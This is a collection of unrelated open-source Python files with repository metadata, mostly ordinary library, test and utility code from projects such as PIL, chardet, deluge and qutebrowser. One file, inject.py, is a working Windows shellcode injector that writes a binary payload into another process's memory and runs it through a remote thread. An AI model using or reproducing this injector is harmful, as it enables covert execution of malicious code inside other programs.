"darkolivegreen": "#556b2f",
"darkorange": "#ff8c00",
"darkorchid": "#9932cc",
"darkred": "#8b0000",
"darksalmon": "#e9967a",
"darkseagreen": "#8fbc8f",
"darkslateblue": "#483d8b",
"darkslategray": "#2f4f4f",
"darkslategrey": "#2f4f4f",
"darkturquoise": "#00ced1",
"darkviolet": "#9400d3",
"deeppink": "#ff1493",
"deepskyblue": "#00bfff",
"dimgray": "#696969",
"dimgrey": "#696969",
"dodgerblue": "#1e90ff",
"firebrick": "#b22222",
"floralwhite": "#fffaf0",
"forestgreen": "#228b22",
"fuchsia": "#ff00ff",
"gainsboro": "#dcdcdc",
"ghostwhite": "#f8f8ff",
"gold": "#ffd700",
"goldenrod": "#daa520",
"gray": "#808080",
"grey": "#808080",
"green": "#008000",
"greenyellow": "#adff2f",
"honeydew": "#f0fff0",
"hotpink": "#ff69b4",
"indianred": "#cd5c5c",
"indigo": "#4b0082",
"ivory": "#fffff0",
"khaki": "#f0e68c",
"lavender": "#e6e6fa",
"lavenderblush": "#fff0f5",
"lawngreen": "#7cfc00",
"lemonchiffon": "#fffacd",
"lightblue": "#add8e6",
"lightcoral": "#f08080",
"lightcyan": "#e0ffff",
"lightgoldenrodyellow": "#fafad2",
"lightgreen": "#90ee90",
"lightgray": "#d3d3d3",
"lightgrey": "#d3d3d3",
"lightpink": "#ffb6c1",
"lightsalmon": "#ffa07a",
"lightseagreen": "#20b2aa",
"lightskyblue": "#87cefa",
"lightslategray": "#778899",
"lightslategrey": "#778899",
"lightsteelblue": "#b0c4de",
"lightyellow": "#ffffe0",
"lime": "#00ff00",
"limegreen": "#32cd32",
"linen": "#faf0e6",
"magenta": "#ff00ff",
"maroon": "#800000",
"mediumaquamarine": "#66cdaa",
"mediumblue": "#0000cd",
"mediumorchid": "#ba55d3",
"mediumpurple": "#9370db",
"mediumseagreen": "#3cb371",
"mediumslateblue": "#7b68ee",
"mediumspringgreen": "#00fa9a",
"mediumturquoise": "#48d1cc",
"mediumvioletred": "#c71585",
"midnightblue": "#191970",
"mintcream": "#f5fffa",
"mistyrose": "#ffe4e1",
"moccasin": "#ffe4b5",
"navajowhite": "#ffdead",
"navy": "#000080",
"oldlace": "#fdf5e6",
"olive": "#808000",
"olivedrab": "#6b8e23",
"orange": "#ffa500",
"orangered": "#ff4500",
"orchid": "#da70d6",
"palegoldenrod": "#eee8aa",
"palegreen": "#98fb98",
"paleturquoise": "#afeeee",
"palevioletred": "#db7093",
"papayawhip": "#ffefd5",
"peachpuff": "#ffdab9",
"peru": "#cd853f",
"pink": "#ffc0cb",
"plum": "#dda0dd",
"powderblue": "#b0e0e6",
"purple": "#800080",
"red": "#ff0000",
"rosybrown": "#bc8f8f",
"royalblue": "#4169e1",
"saddlebrown": "#8b4513",
"salmon": "#fa8072",
"sandybrown": "#f4a460",
"seagreen": "#2e8b57",
"seashell": "#fff5ee",
"sienna": "#a0522d",
"silver": "#c0c0c0",
"skyblue": "#87ceeb",
"slateblue": "#6a5acd",
"slategray": "#708090",
"slategrey": "#708090",
"snow": "#fffafa",
"springgreen": "#00ff7f",
"steelblue": "#4682b4",
"tan": "#d2b48c",
"teal": "#008080",
"thistle": "#d8bfd8",
"tomato": "#ff6347",
"turquoise": "#40e0d0",
"violet": "#ee82ee",
"wheat": "#f5deb3",
"white": "#ffffff",
"whitesmoke": "#f5f5f5",
"yellow": "#ffff00",
"yellowgreen": "#9acd32",
}
| Amechi101/concepteur-market-app | venv/lib/python2.7/site-packages/PIL/ImageColor.py | Python | mit | 8,085 | 0.007421 |
#!/bin/python
"""
Lisa just got a new math workbook. A workbook contains exercise problems, grouped into chapters.
There are nn chapters in Lisa's workbook, numbered from 11 to nn.
The ii-th chapter has titi problems, numbered from 11 to titi.
Each page can hold up to kk problems. There are no empty pages or unnecessary spaces, so only the last page of a chapter may contain fewer than kk problems.
Each new chapter starts on a new page, so a page will never contain problems from more than one chapter.
The page number indexing starts at 11.
Lisa believes a problem to be special if its index (within a chapter) is the same as the page number where it's located. Given the details for Lisa's workbook, can you count its number of special problems?
Note: See the diagram in the Explanation section for more details.
Input Format
The first line contains two integers nn and kk — the number of chapters and the maximum number of problems per page respectively.
The second line contains nn integers t1,t2,…,tnt1,t2,…,tn, where titi denotes the number of problems in the ii-th chapter.
Constraints
1=<n,k,ti=<1001=<n,k,ti=<100
Output Format
Print the number of special problems in Lisa's workbook.
Sample Input
5 3
4 2 6 1 10
Sample Output
4
"""
def spl_question(arr, n, k):
prev_accum = cumm = tot_pg_num = ques = count = 0
for each_chptr in arr:
# O(N)
pgs, rem = divmod(each_chptr, k)
ques = prev_accum = cumm = 0
for pg in xrange(pgs):
tot_pg_num += 1
ques += k
cumm = ques
if prev_accum < tot_pg_num <= cumm:
count += 1
prev_accum = cumm
if rem:
tot_pg_num += 1
ques += rem
cumm = ques
if prev_accum < tot_pg_num <= cumm:
count += 1
return count
if __name__ == "__main__":
n, k = raw_input().strip("\n").split()
n, k = int(n), int(k)
arr = map(int, raw_input().strip("\n").split())
print spl_question(arr, n, k) | codecakes/algorithms_monk | implementation/lisa_workbook_array_single_iter.py | Python | mit | 2,037 | 0.003939 |
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .constants import eStart, eError, eItsMe
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(UTF8SMModel)
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mCodingSM.reset()
self._mNumOfMBChar = 0
def get_charset_name(self):
return "utf-8"
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == eError:
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1
if self.get_state() == constants.eDetecting:
if self.get_confidence() > constants.SHORTCUT_THRESHOLD:
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
unlike = 0.99
if self._mNumOfMBChar < 6:
for i in range(0, self._mNumOfMBChar):
unlike = unlike * ONE_CHAR_PROB
return 1.0 - unlike
else:
return unlike
| archifix/settings | sublime/Packages/SublimeCodeIntel/libs/chardet/utf8prober.py | Python | mit | 2,680 | 0.001866 |
from django.core.management import call_command
import pytest
import septentrion
def test_showmigrations_command_override(mocker):
mock_django_handle = mocker.patch(
'django.core.management.commands.showmigrations.Command.handle')
mock_show_migrations = mocker.patch(
'septentrion.show_migrations', return_value=b'')
call_command('showmigrations')
assert mock_django_handle.called is False
assert mock_show_migrations.called is True
@pytest.mark.parametrize("manage", [True, False, None])
def test_north_manage_migrations(mocker, settings, manage):
if manage is not None:
settings.NORTH_MANAGE_DB = manage
if manage is None and hasattr(settings, 'NORTH_MANAGE_DB'):
del settings.NORTH_MANAGE_DB
mock = mocker.patch('septentrion.show_migrations', return_value=b'')
call_command('showmigrations')
assert mock.called == bool(manage)
def test_showmigrations_schema_not_inited(capsys, mocker):
mock_version = mocker.patch(
'septentrion.db.get_current_schema_version')
# schema not inited
mock_version.return_value = None
call_command('showmigrations')
captured = capsys.readouterr()
assert 'Current version is None' in captured.out
def test_showmigrations_schema(capsys, mocker):
# schema inited
mock_version = mocker.patch(
'septentrion.db.get_current_schema_version')
mock_version.return_value = septentrion.versions.Version.from_string('1.1')
mock_plan = mocker.patch(
'septentrion.core.build_migration_plan')
mock_plan.return_value = [
{
'version': "Version 1.2",
'plan': [
('a-ddl.sql', True, '/somewhere/a-ddl.sql', False),
('b-ddl.sql', False, '/somewhere/b-ddl.sql', True),
]
},
{
'version': "Version 1.3",
'plan': [
('c-ddl.sql', False, '/somewhere/c-ddl.sql', False),
]
}
]
call_command('showmigrations')
captured = capsys.readouterr()
assert "Current version is 1.1" in captured.out
assert "Target version is 1.3" in captured.out
assert "Version 1.2" in captured.out
assert "[X] \x1b[0ma-ddl.sql" in captured.out
assert "[ ] \x1b[0mb-ddl.sql" in captured.out
assert "Version 1.3" in captured.out
assert "[ ] \x1b[0mc-ddl.sql" in captured.out
| novafloss/django-north | tests/test_showmigrations_command.py | Python | mit | 2,400 | 0 |
# -*- coding: utf-8 -*-
from model.group import Group
def test_add_group(app):
old_groups = app.group.get_group_list()
group = (Group(name="fdsasdaf", header="group", footer="group"))
app.group.create(group)
assert len(old_groups) + 1 == app.group.count()
new_groups = app.group.get_group_list()
old_groups.append(group)
assert sorted(old_groups, key = Group.id_or_max) == sorted (new_groups,key = Group.id_or_max)
#def test_add_empty_group(app):
# old_groups = app.group.get_group_list()
# group = (Group(name="", header="", footer=""))
# app.group.create(group)
# new_groups = app.group.get_group_list()
# assert len(old_groups) + 1 == len(new_groups)
# old_groups.append(group)
# assert sorted(old_groups, key = Group.id_or_max) == sorted (new_groups,key = Group.id_or_max)
| Coriolan8/python_traning | test/test_add_group.py | Python | apache-2.0 | 824 | 0.01335 |
# coding=utf-8
__all__ = ['admin']
| CSGreater-Developers/HMC-Grader | app/userViews/admin/__init__.py | Python | mit | 36 | 0 |
"""Script to display a collection of paths after inserting one new path
Usage:
add_to_a_path.py [-U] PATHS PATH
add_to_a_path.py [-U] (-s | -i INDEX ) PATHS PATH
Options:
-h, --help Show this help and exit
-v, --version Show version number and exit
-s, --start Add the path at start of list of paths
-i INDEX, --index=INDEX The index at which the path will be inserted
Examples of use:
$ export PATH=/bin:/usr/bin
$ add_to_a_path.py PATH /usr/local/bin
PATH=/bin:/usr/bin:/usr/local/bin
$ add_to_a_path.py PATH /usr/local/bin --start
PATH=/usr/local/bin:/bin:/usr/bin
"""
from __future__ import print_function
import os
import sys
import argparse
from bdb import BdbQuit
__version__ = '0.1.0'
class ScriptError(NotImplementedError):
pass
def version():
print('%s %s' % (args, __version__))
raise SystemExit
def parse_args():
"""Parse out command line arguments"""
parser = argparse.ArgumentParser(description=__doc__.splitlines()[0])
parser.add_argument('symbol', help='The bash symbol to be changed')
parser.add_argument('path', help='The path to be added')
parser.add_argument('-s', '--start', action='store_true',
help='Add the path at start of list of paths')
parser.add_argument('-i', '--index', type=int,
help='The index at which the path will be inserted')
parser.add_argument('-v', '--version', action='store_true',
help='Show version')
args = parser.parse_args()
if args.version:
version()
if not args.index:
if args.start:
args.index = 0
else:
args.index = False
return args
def _add_symbol_to_paths(paths, symbol, i):
if i is False:
i = len(paths)
result = paths[:]
if not symbol:
return result
if symbol not in result:
result.insert(i, symbol)
return result
j = result.index(symbol)
if i != j:
del result[j]
result.insert(i, symbol)
return result
def get_arg_path(args):
path = args.path
if not path:
return ''
user_path = os.path.expanduser(path)
real_path = os.path.realpath(user_path)
if not os.path.isdir(real_path):
return ''
return real_path
def split_paths(string):
if not string:
return []
return [p for p in string.split(os.path.pathsep) if p]
def get_paths(args):
symbol = args.symbol
paths_string = ''
if symbol in os.environ:
paths_string = os.environ[symbol]
elif os.path.pathsep in symbol:
paths_string = symbol
return split_paths(paths_string)
def script(args):
arg_path = get_arg_path(args)
paths = get_paths(args)
if not arg_path:
if not paths:
return False
elif os.path.isdir(arg_path):
if arg_path in paths:
paths.remove(arg_path)
paths = _add_symbol_to_paths(paths, arg_path, args.index)
else:
return False
print('='.join((args.symbol, os.path.pathsep.join(paths))))
return True
def main():
"""Run the script"""
try:
args = parse_args()
return os.EX_OK if script(args) else not os.EX_OK
except (SystemExit, BdbQuit):
pass
return os.EX_OK
if __name__ == '__main__':
sys.exit(main())
| jalanb/jab | src/python/add_to_a_path.py | Python | mit | 3,399 | 0 |
from __future__ import absolute_import, division, print_function
import _ast
from jaspyx.context.block import BlockContext
from jaspyx.visitor import BaseVisitor
class IfElse(BaseVisitor):
def visit_If(self, node, skip_indent=False):
if not skip_indent:
self.indent()
self.output('if(')
self.visit(node.test)
self.output(') ')
self.block(node.body, context=BlockContext(self.stack[-1]))
if node.orelse:
self.output(' else ')
if len(node.orelse) == 1 and isinstance(node.orelse[0], _ast.If):
self.visit_If(node.orelse[0], True)
else:
self.block(node.orelse, context=BlockContext(self.stack[-1]))
self.output('\n')
else:
self.output('\n')
| ztane/jaspyx | jaspyx/visitor/if_else.py | Python | mit | 809 | 0 |
"""
mock_django.signals
~~~~~~~~~~~~~~~~
:copyright: (c) 2012 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import contextlib
import mock
@contextlib.contextmanager
def mock_signal_receiver(signal, wraps=None, **kwargs):
"""
Temporarily attaches a receiver to the provided ``signal`` within the scope
of the context manager.
The mocked receiver is returned as the ``as`` target of the ``with``
statement.
To have the mocked receiver wrap a callable, pass the callable as the
``wraps`` keyword argument. All other keyword arguments provided are passed
through to the signal's ``connect`` method.
>>> with mock_signal_receiver(post_save, sender=Model) as receiver:
>>> Model.objects.create()
>>> assert receiver.call_count = 1
"""
if wraps is None:
def wraps(*args, **kwrags):
return None
receiver = mock.Mock(wraps=wraps)
signal.connect(receiver, **kwargs)
yield receiver
signal.disconnect(receiver)
| devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/mock_django/signals.py | Python | agpl-3.0 | 1,028 | 0 |
from couchpotato.core.event import addEvent
from couchpotato.core.logger import CPLog
from couchpotato.core.notifications.base import Notification
import os
import subprocess
log = CPLog(__name__)
class Synoindex(Notification):
index_path = '/usr/syno/bin/synoindex'
def __init__(self):
super(Synoindex, self).__init__()
addEvent('renamer.after', self.addToLibrary)
def addToLibrary(self, message = None, group = {}):
if self.isDisabled(): return
command = [self.index_path, '-A', group.get('destination_dir')]
log.info('Executing synoindex command: %s ', command)
try:
p = subprocess.Popen(command, stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
out = p.communicate()
log.info('Result from synoindex: %s', str(out))
return True
except OSError, e:
log.error('Unable to run synoindex: %s', e)
return False
return True
def test(self, **kwargs):
return {
'success': os.path.isfile(self.index_path)
}
| coolbombom/CouchPotatoServer | couchpotato/core/notifications/synoindex/main.py | Python | gpl-3.0 | 1,093 | 0.009149 |
# -*- coding: utf-8 -*-
#
# deluge/ui/common.py
#
# Copyright (C) Damien Churchill 2008-2009 <[email protected]>
# Copyright (C) Andrew Resch 2009 <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
"""
The ui common module contains methods and classes that are deemed useful for
all the interfaces.
"""
import os
import sys
import urlparse
import locale
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from deluge import bencode
from deluge.common import decode_string, path_join
from deluge.log import LOG as log
import deluge.configmanager
class TorrentInfo(object):
"""
Collects information about a torrent file.
:param filename: The path to the torrent
:type filename: string
"""
def __init__(self, filename, filetree=1):
# Get the torrent data from the torrent file
try:
log.debug("Attempting to open %s.", filename)
self.__m_filedata = open(filename, "rb").read()
self.__m_metadata = bencode.bdecode(self.__m_filedata)
except Exception, e:
log.warning("Unable to open %s: %s", filename, e)
raise e
self.__m_info_hash = sha(bencode.bencode(self.__m_metadata["info"])).hexdigest()
# Get encoding from torrent file if available
self.encoding = "UTF-8"
if "encoding" in self.__m_metadata:
self.encoding = self.__m_metadata["encoding"]
elif "codepage" in self.__m_metadata:
self.encoding = str(self.__m_metadata["codepage"])
# Check if 'name.utf-8' is in the torrent and if not try to decode the string
# using the encoding found.
if "name.utf-8" in self.__m_metadata["info"]:
self.__m_name = decode_string(self.__m_metadata["info"]["name.utf-8"])
else:
self.__m_name = decode_string(self.__m_metadata["info"]["name"], self.encoding)
# Get list of files from torrent info
paths = {}
dirs = {}
if self.__m_metadata["info"].has_key("files"):
prefix = ""
if len(self.__m_metadata["info"]["files"]) > 1:
prefix = self.__m_name
for index, f in enumerate(self.__m_metadata["info"]["files"]):
if "path.utf-8" in f:
path = os.path.join(prefix, *f["path.utf-8"])
else:
path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding)
f["index"] = index
paths[path] = f
dirname = os.path.dirname(path)
while dirname:
dirinfo = dirs.setdefault(dirname, {})
dirinfo["length"] = dirinfo.get("length", 0) + f["length"]
dirname = os.path.dirname(dirname)
if filetree == 2:
def walk(path, item):
if item["type"] == "dir":
item.update(dirs[path])
else:
item.update(paths[path])
item["download"] = True
file_tree = FileTree2(paths.keys())
file_tree.walk(walk)
else:
def walk(path, item):
if type(item) is dict:
return item
return [paths[path]["index"], paths[path]["length"], True]
file_tree = FileTree(paths)
file_tree.walk(walk)
self.__m_files_tree = file_tree.get_tree()
else:
if filetree == 2:
self.__m_files_tree = {
"contents": {
self.__m_name: {
"type": "file",
"index": 0,
"length": self.__m_metadata["info"]["length"],
"download": True
}
}
}
else:
self.__m_files_tree = {
self.__m_name: (0, self.__m_metadata["info"]["length"], True)
}
self.__m_files = []
if self.__m_metadata["info"].has_key("files"):
prefix = ""
if len(self.__m_metadata["info"]["files"]) > 1:
prefix = self.__m_name
for f in self.__m_metadata["info"]["files"]:
if "path.utf-8" in f:
path = os.path.join(prefix, *f["path.utf-8"])
else:
path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding)
self.__m_files.append({
'path': path,
'size': f["length"],
'download': True
})
else:
self.__m_files.append({
"path": self.__m_name,
"size": self.__m_metadata["info"]["length"],
"download": True
})
def as_dict(self, *keys):
"""
Return the torrent info as a dictionary, only including the passed in
keys.
:param keys: a number of key strings
:type keys: string
"""
return dict([(key, getattr(self, key)) for key in keys])
@property
def name(self):
"""
The name of the torrent.
:rtype: string
"""
return self.__m_name
@property
def info_hash(self):
"""
The torrents info_hash
:rtype: string
"""
return self.__m_info_hash
@property
def files(self):
"""
A list of the files that the torrent contains.
:rtype: list
"""
return self.__m_files
@property
def files_tree(self):
"""
A dictionary based tree of the files.
::
{
"some_directory": {
"some_file": (index, size, download)
}
}
:rtype: dictionary
"""
return self.__m_files_tree
@property
def metadata(self):
"""
The torrents metadata.
:rtype: dictionary
"""
return self.__m_metadata
@property
def filedata(self):
"""
The torrents file data. This will be the bencoded dictionary read
from the torrent file.
:rtype: string
"""
return self.__m_filedata
class FileTree2(object):
"""
Converts a list of paths in to a file tree.
:param paths: The paths to be converted
:type paths: list
"""
def __init__(self, paths):
self.tree = {"contents": {}, "type": "dir"}
def get_parent(path):
parent = self.tree
while "/" in path:
directory, path = path.split("/", 1)
child = parent["contents"].get(directory)
if child is None:
parent["contents"][directory] = {
"type": "dir",
"contents": {}
}
parent = parent["contents"][directory]
return parent, path
for path in paths:
if path[-1] == "/":
path = path[:-1]
parent, path = get_parent(path)
parent["contents"][path] = {
"type": "dir",
"contents": {}
}
else:
parent, path = get_parent(path)
parent["contents"][path] = {
"type": "file"
}
def get_tree(self):
"""
Return the tree.
:returns: the file tree.
:rtype: dictionary
"""
return self.tree
def walk(self, callback):
"""
Walk through the file tree calling the callback function on each item
contained.
:param callback: The function to be used as a callback, it should have
the signature func(item, path) where item is a `tuple` for a file
and `dict` for a directory.
:type callback: function
"""
def walk(directory, parent_path):
for path in directory["contents"].keys():
full_path = path_join(parent_path, path)
if directory["contents"][path]["type"] == "dir":
directory["contents"][path] = callback(full_path, directory["contents"][path]) or \
directory["contents"][path]
walk(directory["contents"][path], full_path)
else:
directory["contents"][path] = callback(full_path, directory["contents"][path]) or \
directory["contents"][path]
walk(self.tree, "")
def __str__(self):
lines = []
def write(path, item):
depth = path.count("/")
path = os.path.basename(path)
path = path + "/" if item["type"] == "dir" else path
lines.append(" " * depth + path)
self.walk(write)
return "\n".join(lines)
class FileTree(object):
"""
Convert a list of paths in a file tree.
:param paths: The paths to be converted.
:type paths: list
"""
def __init__(self, paths):
self.tree = {}
def get_parent(path):
parent = self.tree
while "/" in path:
directory, path = path.split("/", 1)
child = parent.get(directory)
if child is None:
parent[directory] = {}
parent = parent[directory]
return parent, path
for path in paths:
if path[-1] == "/":
path = path[:-1]
parent, path = get_parent(path)
parent[path] = {}
else:
parent, path = get_parent(path)
parent[path] = []
def get_tree(self):
"""
Return the tree, after first converting all file lists to a tuple.
:returns: the file tree.
:rtype: dictionary
"""
def to_tuple(path, item):
if type(item) is dict:
return item
return tuple(item)
self.walk(to_tuple)
return self.tree
def walk(self, callback):
"""
Walk through the file tree calling the callback function on each item
contained.
:param callback: The function to be used as a callback, it should have
the signature func(item, path) where item is a `tuple` for a file
and `dict` for a directory.
:type callback: function
"""
def walk(directory, parent_path):
for path in directory.keys():
full_path = os.path.join(parent_path, path)
if type(directory[path]) is dict:
directory[path] = callback(full_path, directory[path]) or \
directory[path]
walk(directory[path], full_path)
else:
directory[path] = callback(full_path, directory[path]) or \
directory[path]
walk(self.tree, "")
def __str__(self):
lines = []
def write(path, item):
depth = path.count("/")
path = os.path.basename(path)
path = type(item) is dict and path + "/" or path
lines.append(" " * depth + path)
self.walk(write)
return "\n".join(lines)
def get_localhost_auth():
"""
Grabs the localclient auth line from the 'auth' file and creates a localhost uri
:returns: with the username and password to login as
:rtype: tuple
"""
auth_file = deluge.configmanager.get_config_dir("auth")
if os.path.exists(auth_file):
for line in open(auth_file):
if line.startswith("#"):
# This is a comment line
continue
line = line.strip()
try:
lsplit = line.split(":")
except Exception, e:
log.error("Your auth file is malformed: %s", e)
continue
if len(lsplit) == 2:
username, password = lsplit
elif len(lsplit) == 3:
username, password, level = lsplit
else:
log.error("Your auth file is malformed: Incorrect number of fields!")
continue
if username == "localclient":
return (username, password)
return ("", "")
| laanwj/deluge | deluge/ui/common.py | Python | gpl-3.0 | 13,980 | 0.001431 |
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2015-2021 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""A QProcess which shows notifications in the GUI."""
import locale
import shlex
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QObject, QProcess,
QProcessEnvironment)
from qutebrowser.utils import message, log, utils
from qutebrowser.browser import qutescheme
class GUIProcess(QObject):
"""An external process which shows notifications in the GUI.
Args:
cmd: The command which was started.
args: A list of arguments which gets passed.
verbose: Whether to show more messages.
_output_messages: Show output as messages.
_started: Whether the underlying process is started.
_proc: The underlying QProcess.
_what: What kind of thing is spawned (process/editor/userscript/...).
Used in messages.
Signals:
error/finished/started signals proxied from QProcess.
"""
error = pyqtSignal(QProcess.ProcessError)
finished = pyqtSignal(int, QProcess.ExitStatus)
started = pyqtSignal()
def __init__(self, what, *, verbose=False, additional_env=None,
output_messages=False, parent=None):
super().__init__(parent)
self._what = what
self.verbose = verbose
self._output_messages = output_messages
self._started = False
self.cmd = None
self.args = None
self._proc = QProcess(self)
self._proc.errorOccurred.connect(self._on_error)
self._proc.errorOccurred.connect(self.error)
self._proc.finished.connect(self._on_finished)
self._proc.finished.connect(self.finished)
self._proc.started.connect(self._on_started)
self._proc.started.connect(self.started)
if additional_env is not None:
procenv = QProcessEnvironment.systemEnvironment()
for k, v in additional_env.items():
procenv.insert(k, v)
self._proc.setProcessEnvironment(procenv)
@pyqtSlot(QProcess.ProcessError)
def _on_error(self, error):
"""Show a message if there was an error while spawning."""
if error == QProcess.Crashed and not utils.is_windows:
# Already handled via ExitStatus in _on_finished
return
msg = self._proc.errorString()
message.error("Error while spawning {}: {}".format(self._what, msg))
@pyqtSlot(int, QProcess.ExitStatus)
def _on_finished(self, code, status):
"""Show a message when the process finished."""
self._started = False
log.procs.debug("Process finished with code {}, status {}.".format(
code, status))
encoding = locale.getpreferredencoding(do_setlocale=False)
stderr = self._proc.readAllStandardError().data().decode(
encoding, 'replace')
stdout = self._proc.readAllStandardOutput().data().decode(
encoding, 'replace')
if self._output_messages:
if stdout:
message.info(stdout.strip())
if stderr:
message.error(stderr.strip())
if status == QProcess.CrashExit:
exitinfo = "{} crashed.".format(self._what.capitalize())
message.error(exitinfo)
elif status == QProcess.NormalExit and code == 0:
exitinfo = "{} exited successfully.".format(
self._what.capitalize())
if self.verbose:
message.info(exitinfo)
else:
assert status == QProcess.NormalExit
# We call this 'status' here as it makes more sense to the user -
# it's actually 'code'.
exitinfo = ("{} exited with status {}, see :messages for "
"details.").format(self._what.capitalize(), code)
message.error(exitinfo)
if stdout:
log.procs.error("Process stdout:\n" + stdout.strip())
if stderr:
log.procs.error("Process stderr:\n" + stderr.strip())
qutescheme.spawn_output = self._spawn_format(exitinfo, stdout, stderr)
def _spawn_format(self, exitinfo, stdout, stderr):
"""Produce a formatted string for spawn output."""
stdout = (stdout or "(No output)").strip()
stderr = (stderr or "(No output)").strip()
spawn_string = ("{}\n"
"\nProcess stdout:\n {}"
"\nProcess stderr:\n {}").format(exitinfo,
stdout, stderr)
return spawn_string
@pyqtSlot()
def _on_started(self):
"""Called when the process started successfully."""
log.procs.debug("Process started.")
assert not self._started
self._started = True
def _pre_start(self, cmd, args):
"""Prepare starting of a QProcess."""
if self._started:
raise ValueError("Trying to start a running QProcess!")
self.cmd = cmd
self.args = args
fake_cmdline = ' '.join(shlex.quote(e) for e in [cmd] + list(args))
log.procs.debug("Executing: {}".format(fake_cmdline))
if self.verbose:
message.info('Executing: ' + fake_cmdline)
def start(self, cmd, args):
"""Convenience wrapper around QProcess::start."""
log.procs.debug("Starting process.")
self._pre_start(cmd, args)
self._proc.start(cmd, args)
self._proc.closeWriteChannel()
def start_detached(self, cmd, args):
"""Convenience wrapper around QProcess::startDetached."""
log.procs.debug("Starting detached.")
self._pre_start(cmd, args)
ok, _pid = self._proc.startDetached(
cmd, args, None) # type: ignore[call-arg]
if not ok:
message.error("Error while spawning {}".format(self._what))
return False
log.procs.debug("Process started.")
self._started = True
return True
def exit_status(self):
return self._proc.exitStatus()
| forkbong/qutebrowser | qutebrowser/misc/guiprocess.py | Python | gpl-3.0 | 6,787 | 0 |
#First parameter is path for binary file containing instructions to be injected
#Second parameter is Process Identifier for process to be injected to
import binascii
import sys
from ctypes import *
if len(sys.argv) < 3:
print("usage inject.py <shellcodefile.bin> <pid>")
sys.exit(1)
file = open(sys.argv[1],'rb')
buff=file.read()
file.close()
print("buffer length = ")
print(len(buff))
print("pid = "+sys.argv[2])
handle = windll.kernel32.OpenProcess(0x1f0fff,0, int(sys.argv[2]))
if (handle == 0):
print("handle == 0")
sys.exit(1)
addr = windll.kernel32.VirtualAllocEx(handle,0,len(buff),0x3000|0x1000,0x40)
if(addr == 0):
print("addr = = 0")
sys.exit(1)
bytes = c_ubyte()
windll.kernel32.WriteProcessMemory(handle, addr , buff, len(buff), byref(bytes))
handle1=windll.kernel32.CreateRemoteThread(handle , 0x0, 0x0 , addr, 0x0,0x0 , 0x0)
if(handle1 == 0):
print("handle1 = = 0");
sys.exit(1)
windll.kernel32.CloseHandle(handle) | idkwim/snippets | inject.py | Python | mit | 956 | 0.034519 |
""" The SGE TimeLeft utility interrogates the SGE batch system for the
current CPU consumed, as well as its limit.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import os
import re
import time
import socket
from DIRAC import S_OK, S_ERROR
from DIRAC.Resources.Computing.BatchSystems.TimeLeft.TimeLeft import runCommand
from DIRAC.Resources.Computing.BatchSystems.TimeLeft.ResourceUsage import ResourceUsage
class SGEResourceUsage(ResourceUsage):
"""
This is the SGE plugin of the TimeLeft Utility
"""
def __init__(self):
"""Standard constructor"""
super(SGEResourceUsage, self).__init__("SGE", "JOB_ID")
self.queue = os.environ.get("QUEUE")
sgePath = os.environ.get("SGE_BINARY_PATH")
if sgePath:
os.environ["PATH"] += ":" + sgePath
self.log.verbose("JOB_ID=%s, QUEUE=%s" % (self.jobID, self.queue))
self.startTime = time.time()
def getResourceUsage(self):
"""Returns S_OK with a dictionary containing the entries CPU, CPULimit,
WallClock, WallClockLimit, and Unit for current slot.
"""
